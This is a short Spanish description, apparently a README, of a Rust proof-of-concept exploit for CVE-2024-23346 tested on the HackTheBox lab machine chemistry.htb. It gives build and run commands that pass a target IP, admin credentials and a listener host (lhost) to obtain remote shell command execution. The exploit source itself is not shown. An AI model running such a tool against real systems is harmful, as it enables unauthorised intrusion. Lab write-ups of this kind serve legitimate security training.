
Un exploit en Rust para CVE-2024-23346 que funciona como una "terminal" (probado en chemistry.htb)
Un script de explotación en Rust para CVE-2024-23346.
Como se muestra a continuación, el POC utiliza la vulnerabilidad de inyección de código y ejecuta comandos remotos de shell como en una terminal.
Pasos para ejecutar el exploit:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19O
cargo build -r (el binario estará en target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19El script del exploit está inspirado en el experto en scripting de Python MAWK0235